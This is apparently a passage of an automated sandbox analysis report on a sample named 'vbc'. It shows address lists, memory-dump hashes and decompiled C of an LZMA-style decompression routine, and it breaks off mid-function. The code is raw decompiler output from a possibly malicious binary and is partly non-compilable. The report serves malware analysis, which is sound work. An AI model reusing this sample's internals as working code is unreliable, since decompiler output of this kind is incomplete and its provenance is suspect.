                                                0x00406d76
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00406c4a
                                                0x00406c4a
                                                0x00406c4e
                                                0x00407114
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406c54
                                                0x00406c54
                                                0x00406c57
                                                0x00406c5a
                                                0x00406c5d
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c5f
                                                0x00406c62
                                                0x00406c65
                                                0x00406c68
                                                0x00406c6b
                                                0x00406c6e
                                                0x00406c71
                                                0x00406c72
                                                0x00406c74
                                                0x00406c74
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c7d
                                                0x00406c80
                                                0x00406c80
                                                0x00406c80
                                                0x00406c83
                                                0x00406c85
                                                0x00406c85
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00406f0b
                                                0x00406c88
                                                0x00406c88
                                                0x00000000
                                                0x00406c88
                                                0x00406f09
                                                0x0040713e
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d
                                                0x00407175
                                                0x00407175
                                                0x00000000
                                                0x00407175
                                                0x00406fc2
                                                0x00407042
                                                0x0040700b

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
                                                • Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
                                                • Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406F10() {
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int* _t605;
                                                				void* _t612;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t612 - 0x40) != 0) {
                                                						 *(_t612 - 0x84) = 0x13;
                                                						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x4c);
                                                						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                						__ecx =  *(__ebp - 0x58);
                                                						__eax =  *(__ebp - 0x4c) << 4;
                                                						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                						L130:
                                                						 *(__ebp - 0x58) = __eax;
                                                						 *(__ebp - 0x40) = 3;
                                                						L144:
                                                						 *(__ebp - 0x7c) = 0x14;
                                                						L145:
                                                						__eax =  *(__ebp - 0x40);
                                                						 *(__ebp - 0x50) = 1;
                                                						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                						L149:
                                                						if( *(__ebp - 0x48) <= 0) {
                                                							__ecx =  *(__ebp - 0x40);
                                                							__ebx =  *(__ebp - 0x50);
                                                							0 = 1;
                                                							__eax = 1 << __cl;
                                                							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                							__eax =  *(__ebp - 0x7c);
                                                							 *(__ebp - 0x44) = __ebx;
                                                							while(1) {
                                                								L140:
                                                								 *(_t612 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t612 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
                                                										case 0:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t534 =  *( *(_t612 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t569);
                                                											_push(9);
                                                											_pop(_t570);
                                                											_t608 = _t538 / _t569;
                                                											_t540 = _t538 % _t569 & 0x000000ff;
                                                											asm("cdq");
                                                											_t603 = _t540 % _t570 & 0x000000ff;
                                                											 *(_t612 - 0x3c) = _t603;
                                                											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                												L10:
                                                												if(_t611 == 0) {
                                                													L12:
                                                													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t611 = _t611 - 1;
                                                													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                												} while (_t611 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t612 - 4) != 0) {
                                                												GlobalFree( *(_t612 - 4));
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t612 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t45 = _t612 - 0x48;
                                                											 *_t45 =  *(_t612 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t612 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t612 - 0x40);
                                                											if(_t546 ==  *(_t612 - 0x74)) {
                                                												L20:
                                                												 *(_t612 - 0x48) = 5;
                                                												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t612 - 0x74) = _t546;
                                                											if( *(_t612 - 8) != 0) {
                                                												GlobalFree( *(_t612 - 8));
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                											 *(_t612 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                											 *(_t612 - 0x84) = 6;
                                                											 *(_t612 - 0x4c) = _t553;
                                                											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											_t67 = _t612 - 0x70;
                                                											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                											if( *(_t612 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t605;
                                                											_t588 = _t531 & 0x0000ffff;
                                                											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                											if( *(_t612 - 0xc) >= _t564) {
                                                												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                												 *(_t612 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												__eflags = _t532;
                                                												 *_t605 = _t532;
                                                											} else {
                                                												 *(_t612 - 0x10) = _t564;
                                                												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                											}
                                                											if( *(_t612 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t533 =  *(_t612 - 0x84);
                                                											goto L140;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
                                                												__eflags =  *(__ebp - 0x38) - 0xa;
                                                												if( *(__ebp - 0x38) >= 0xa) {
                                                													_t98 = __ebp - 0x38;
                                                													 *_t98 =  *(__ebp - 0x38) - 6;
                                                													__eflags =  *_t98;
                                                												} else {
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                												}
                                                											} else {
                                                												 *(__ebp - 0x38) = 0;
                                                											}
                                                											__eflags =  *(__ebp - 0x34) - __edx;
                                                											if( *(__ebp - 0x34) == __edx) {
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												goto L61;
                                                											} else {
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__ecx =  *(__ebp - 8);
                                                												__ebx = 0;
                                                												__ebx = 1;
                                                												__al =  *((intOrPtr*)(__eax + __ecx));
                                                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                												goto L41;
                                                											}
                                                										case 7:
                                                											__eflags =  *(__ebp - 0x40) - 1;
                                                											if( *(__ebp - 0x40) != 1) {
                                                												__eax =  *(__ebp - 0x24);
                                                												 *(__ebp - 0x80) = 0x16;
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												__eax =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xa;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                												__eax =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 4) + 0x664;
                                                												__eflags = __eax;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L69;
                                                											}
                                                											__eax =  *(__ebp - 4);
                                                											__ecx =  *(__ebp - 0x38);
                                                											 *(__ebp - 0x84) = 8;
                                                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                											goto L132;
                                                										case 8:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xa;
                                                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                											} else {
                                                												__eax =  *(__ebp - 0x38);
                                                												__ecx =  *(__ebp - 4);
                                                												__eax =  *(__ebp - 0x38) + 0xf;
                                                												 *(__ebp - 0x84) = 9;
                                                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                											}
                                                											goto L132;
                                                										case 9:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												goto L90;
                                                											}
                                                											__eflags =  *(__ebp - 0x60);
                                                											if( *(__ebp - 0x60) == 0) {
                                                												goto L171;
                                                											}
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                											__eflags = _t259;
                                                											0 | _t259 = _t259 + _t259 + 9;
                                                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                											goto L76;
                                                										case 0xa:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x84) = 0xb;
                                                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x28);
                                                											goto L89;
                                                										case 0xb:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__ecx =  *(__ebp - 0x24);
                                                												__eax =  *(__ebp - 0x20);
                                                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                											} else {
                                                												__eax =  *(__ebp - 0x24);
                                                											}
                                                											__ecx =  *(__ebp - 0x28);
                                                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                											L89:
                                                											__ecx =  *(__ebp - 0x2c);
                                                											 *(__ebp - 0x2c) = __eax;
                                                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                											L90:
                                                											__eax =  *(__ebp - 4);
                                                											 *(__ebp - 0x80) = 0x15;
                                                											__eax =  *(__ebp - 4) + 0xa68;
                                                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                											goto L69;
                                                										case 0xc:
                                                											L100:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xc;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t335 = __ebp - 0x70;
                                                											 *_t335 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t335;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											__eax =  *(__ebp - 0x2c);
                                                											goto L102;
                                                										case 0xd:
                                                											L37:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xd;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t122 = __ebp - 0x70;
                                                											 *_t122 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t122;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L39:
                                                											__eax =  *(__ebp - 0x40);
                                                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                												goto L48;
                                                											}
                                                											__eflags = __ebx - 0x100;
                                                											if(__ebx >= 0x100) {
                                                												goto L54;
                                                											}
                                                											L41:
                                                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                											 *(__ebp - 0x48) = __eax;
                                                											__eax = __eax + 1;
                                                											__eax = __eax << 8;
                                                											__eax = __eax + __ebx;
                                                											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edx = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												 *(__ebp - 0x40) = 1;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												__ebx = __ebx + __ebx + 1;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edx;
                                                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L39;
                                                											} else {
                                                												goto L37;
                                                											}
                                                										case 0xe:
                                                											L46:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xe;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t156 = __ebp - 0x70;
                                                											 *_t156 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t156;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											while(1) {
                                                												L48:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t170 = __edx + 1; // 0x1
                                                													__ebx = _t170;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													continue;
                                                												} else {
                                                													goto L46;
                                                												}
                                                											}
                                                											L54:
                                                											_t173 = __ebp - 0x34;
                                                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                											__eflags =  *_t173;
                                                											goto L55;
                                                										case 0xf:
                                                											L58:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0xf;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t203 = __ebp - 0x70;
                                                											 *_t203 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t203;
